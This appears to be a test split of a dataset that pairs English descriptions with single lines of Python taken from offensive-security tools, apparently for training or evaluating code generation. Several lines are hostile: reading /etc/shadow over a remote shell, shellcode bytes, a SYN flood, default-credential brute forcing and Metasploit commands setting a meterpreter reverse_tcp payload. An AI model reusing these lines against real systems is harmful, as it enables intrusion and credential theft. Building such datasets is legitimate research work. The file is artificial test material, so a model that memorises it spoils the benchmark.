evil-v2-singleline / test_singleline.tsv
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Assign 0 to seqNum seqNum = 0
Exit the function with argument geoLoc return geoLoc
Exit with value 0 exit(0)
Instantiate the class BoundedSemaphore with argument value equals to maxConnections and assign the result to connection_lock connection_lock = BoundedSemaphore(value=maxConnections)
"Call the method send with argument command concatenated to "" "" concatenated to crash concatenated to ""\r\n""" "s.send(command +"" "" + crash + ""\r\\n"")"
If username is equal to None or password is equals to None if username == None or password == None:
Send the packet synPkt send(synPkt)
Start try block try:
Start the exception block with arguments Exception and e except Exception, e:
Call function send_command with arguments s and 'cat /etc/shadow | grep root' send_command(s, 'cat /etc/shadow | grep root')
"Assign to shellcode the tuple containing ""\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9""" "shellcode = (""\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"""
"Continue the value with ""\NetworkList\Signatures\Unmanaged""" """\NetworkList\Signatures\Unmanaged"""
If the method haslayer with argument DNSRR of pkt is True if pkt.haslayer(DNSRR):
"and ""\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8""" """\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"""
If rLat exists if rLat:
Define the cursor c of the database c = conn.cursor()
Import the library to control the operative system import os
import everything from the library for threads from threading import *
Concatenate the strings kmlPts = kmlPts + srcKML + dstKML
Assign to opt the value ' -o PasswordAuthentication=no' opt = ' -o PasswordAuthentication=no'
Release the lock screenLock.release()
Add the option of the parser p for tgtPort as a string with help specify target port[s] separated by comma parser.add_option('-p', dest='tgtPort', type='string',help='specify target port[s] separated by comma')
Call the open function with argument 'meta.rc' and 'w' configFile = open('meta.rc', 'w')
Set a proxy to browser with address proxy browser.set_proxies(proxy)
Continue the argument with help 'specify wigle username' help='specify wigle username')
Assign to synSpoof the sunSpoof of options synSpoof = options.synSpoof
Call the method spawn with argument connStr of pexpect and assign it to child child = pexpect.spawn(connStr)
Import the library to manage time import time
Acquire the lock screenLock.acquire()
Call the method split with argument '\\' and slice at position -1 and assign it to user user = value.split('\\')[-1]
If passwdFile is not equal to None if passwdFile != None:
Assign to TCPlayer the result of the function TCP with argument sport equals sport and dport equals to 513 TCPlayer = TCP(sport=sport, dport=513)
Exit the function with argument imgFileName return imgFileName
For each ch in val for ch in val:
import the library for parsing import optparse
Call the method login with arguments userName and passWord of ftp ftp.login(userName, passWord)
If the value of Fails is more than 5 if Fails > 5:
If the substring 'read_nonblocking' is found in the result of the function str with argument e if 'read_nonblocking' in str(e):
Assign to the value tcp the data of ip tcp = ip.data
Add the options to parser '-i', dest equals to 'iface', type equals to 'string', help equals to 'specify network interface' parser.add_option('-i', dest='iface', type='string',help='specify network interface')
Define function connect with arguments host user and password def connect(host, user, password):
Assign to skypeDB the path of main.db inside the pathName skypeDB = os.path.join(pathName, 'main.db')
From the library to manipulate IPs import IP as IPTEST from IPy import IP as IPTEST
Assign to kml and empty string kmlPts = ''
Assign an empty list to dnsRecords at the key rrname dnsRecords[rrname] = []
Call the method parse_args with no argument on parser and assign it to the tuple composed of options and args (options, args) = parser.parse_args()
"Assign to parser the OptionParser with argument the concatenation of""usage %prog "" and ""-p <firefox profile path> """ "parser = optparse.OptionParser(""usage %prog ""+""-p <firefox profile path> "")"
Assign to c the cursor of conn c = conn.cursor()
Call the function printGoogle with argument placesDB printGoogle(placesDB)
If the absolute value of ttl casted to int minus the ttlValues at the hey ipsrc casted at int is more than THRESH if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
Append to the list dnsRecords at the key rrname the value rdata dnsRecords[rrname].append(rdata)
Assign to mapLat the value rLat at the position 0, then call the function split with argument '&' at the position 0, then call the function split with argument '=' at the position 1 mapLat = rLat[0].split('&')[0].split('=')[1]
Define the function testUserAgent with argument url an userAgent def testUserAgent(url, userAgent):
Connect to the database placesDB and assign it to conn conn = sqlite3.connect(placesDB)
Call the method append with argument host of tgtHosts tgtHosts.append(host)
Call the addClient function with arguments '', 'root' and 'toor' addClient('', 'root', 'toor')
Call the method write of configFile with argument 'setg DisablePayloadHandler 1\n' configFile.write('setg DisablePayloadHandler 1\\n')
Call the method split with argument ':' on line, take the the result in position 1, call the strip method with argument '\r' then call the strip method with argument '\n' and assign it to passWord passWord = line.split(':')[1].strip('\r').strip('\\n')
Assign to soup the result of BeautufulSoup with argument html soup = BeautifulSoup(html)
Call the method write of configFile with argument 'set RHOST ' concatenated to the function str with argument tgtHost concatenated to '\n' configFile.write('set RHOST ' + str(tgtHost) + '\\n')
Continue the argument and concatenation with 'windows/meterpreter/reverse_tcp\n' 'windows/meterpreter/reverse_tcp\\n')
Call the function confickerExploit with arguments configFile, tgtHost, lhost and lport confickerExploit(configFile, tgtHost, lhost, lport)
For each recycleDir in dirs for recycleDir in dirs:
Exit the function with tuple userName and passWord return (userName, passWord)
Assign to password the value password of options password = options.password
Call the function FTP with argument hostname of the library ftplib and assign it to ftp ftp = ftplib.FTP(hostname)
"Assign to link_finder the function compile with argument 'href=""(.*?)""' of re" "link_finder = re.compile('href=""(.*?)""')"
"and ""\xba\x1e\x53\x31""" """\xba\x1e\x53\x31"")"
Assign to latitude the field 'latitude' of rec latitude = rec['latitude']
Assign the value '' to host host = ''
Assign to text the result with key 'content' text = result['content']
From the library to manipulate packets import everything from scapy.all import *
Define the function synFlood with arguments src and tgt def synFlood(src, tgt):
Call the function listDir with argument recycleDir of os and assign the result to dirList dirList = os.listdir(recycleDir)
Call the function nlst with no argument from the library ftp and assign to dirList dirList = ftp.nlst()
Assign to r the result of all the substring that match the pattern r'q=.*\&' of url r = re.findall(r'q=.*\&', url)
"Continue the arguments with value ""SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList""" """SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"""
Continue the argument and the list with the value '[P|p]assword:' '[P|p]assword:'])
Assign to addr the value '' addr = ''
From the library to edit the Windows registry import everything from _winreg import *
Get the record for that IP and assign it to rec rec = gi.record_by_name(ip)
Import the library to manipulate json files import json
Assign the value True to the variable Found Found = True
Start the try block except:
If the thresh of options is not equal to None if options.thresh != None:
For each cookie in the cookie_jar of ab for cookie in ab.cookie_jar:
Assign to passWord the value 'guest' passWord = 'guest'
Define the function val2addr with argument val def val2addr(val):
Assign to url the result of function str with argument row at position 0 url = str(row[0])
Call the method acquire with no arguments of connection_lock connection_lock.acquire()
Assign to src the src of options src = options.src
For each pkt in pkts for pkt in pkts:
Call the method write of configFile with argument 'exploit -j -z\n' configFile.write('exploit -j -z\\n')
Call the function wiglePrint with argument username, password and macAddr wiglePrint(username, password, macAddr)
Assign to url the value 'http://ip.nefsc.noaa.gov/' url = 'http://ip.nefsc.noaa.gov/'
Assign the value user to self.user self.user = user
Call the function printCookies with argument url printCookies(url)
Assign to userAgent a tuple made of 'User-agent' and 'Mozilla/5.0 (X11; U; '+ 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01' inside a list userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; '+ 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')]
"and ""\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96""" """\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"""
"Assign to kmlheader the string '<?xml version=""1.0"" encoding=""UTF-8""?><kml xmlns=""http://www.opengis.net/kml/2.2"">\n<Document>\n'" "kmlheader = '<?xml version=""1.0"" encoding=""UTF-8""?><kml xmlns=""http://www.opengis.net/kml/2.2"">\\n<Document>\\n'"
Start try block try:
Exit the function with value True return True
Assign to country the field 'country_name' of rec country = rec['country_name']
Call the function sleep with argument 4 of the library time time.sleep(4)
From the library to parse HTML import BeautifilSoup from bs4 import BeautifulSoup
Open the page at the url and assign it to page page = browser.open(url)
Assing to preNum seqNum preNum = seqNum
Assign True to the variable Stop Stop = True
Exit function and return the value addr return addr
If rLon exists if rLon:
Import the library to use a sqlite database import sqlite3
Add the option -u for url as type string with help equals to 'specify url address' parser.add_option('-u', dest='url', type='string', help='specify url address')
Define the function printGoogle with argument placesDB def printGoogle(placesDB):